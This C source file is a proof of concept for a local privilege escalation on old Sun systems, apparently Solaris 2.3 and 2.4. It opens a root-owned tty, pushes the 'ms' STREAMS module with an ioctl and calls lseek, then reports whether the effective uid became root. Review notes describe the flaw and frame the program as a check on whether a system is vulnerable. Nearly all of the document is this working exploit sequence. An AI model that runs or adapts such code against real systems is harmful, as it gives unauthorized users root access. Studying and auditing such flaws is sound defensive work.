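/*
 * Information for this security problem was obtained from Shawn Instenes,
 * who claims he got it from some engineers at Sun.  He said that a patch
 * existed for 2.4 but not 2.3.  I was unable to find a patch for 2.4 or 2.3.
 *
 * If a tty port that is writeable by the user and owned by root is opened
 * and the I_PUSH "ms" ioctl call made followed by an lseek, the effective
 * uid of the user is changed to root.
 *
 * Review notes:
 *  - "2.3" and "2.4" are presumably Solaris releases, given the reference to
 *    Sun; the page does not say so explicitly and gives no patch identifier.
 *  - The issue described is a local privilege escalation: an unprivileged
 *    process ends up with effective uid 0 without any authentication step.
 *  - The stated precondition is a root-owned tty device node that an
 *    unprivileged user can open read/write, so the ownership and mode of
 *    such device nodes is what an administrator would audit.
 *  - The program compares the effective uid before and after the calls, so
 *    on a system where the problem is fixed it reports "unchanged" instead
 *    of claiming a change that did not happen.
 */

/*
 * The header names after each #include were lost when this page was
 * extracted.  The list below is the set this code needs (I_PUSH comes from
 * the STREAMS header <stropts.h>); it is not necessarily the original list.
 */
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <fcntl.h>
#include <unistd.h>
#include <stropts.h>

/**
 * Report whether the I_PUSH "ms" + lseek sequence changes the caller's
 * effective uid on the given tty device.
 *
 * @param argc  argument count; at least 2 is required
 * @param argv  argv[1] is the tty device to open, as the usage text says
 *              (the earlier version ignored it and always opened /dev/ttyb)
 * @return 0 when the sequence ran and the result was printed, 1 when the
 *         device could not be opened or the module could not be pushed
 */
int main(int argc, char *argv[])
{
    if (argc < 2) {
        fprintf(stderr, "usage: %s /dev/ttyX\n", argv[0]);
        exit(1);
    }

    const char *tty_path = argv[1];
    int fd = open(tty_path, O_RDWR);
    if (fd < 0) {
        /* Without a descriptor the calls below would only fail with EBADF. */
        perror(tty_path);
        return 1;
    }

    /* uid_t is not guaranteed to be int, so print it through a long cast. */
    uid_t euid_before = geteuid();
    printf("Your current effective uid is %ld\n", (long)euid_before);

    if (ioctl(fd, I_PUSH, "ms") < 0) {
        /* The module was not pushed, so the condition cannot be observed. */
        perror("ioctl(I_PUSH, \"ms\")");
        close(fd);
        return 1;
    }

    /*
     * The return value is deliberately ignored: the description only says
     * that the call is made, and a seek on a tty may itself report an error.
     */
    (void)lseek(fd, 0, SEEK_CUR);

    uid_t euid_after = geteuid();
    if (euid_after != euid_before) {
        printf("Your effective uid has been changed to %ld\n", (long)euid_after);
    } else {
        printf("Your effective uid is unchanged (%ld)\n", (long)euid_after);
    }

    close(fd);
    return 0;
}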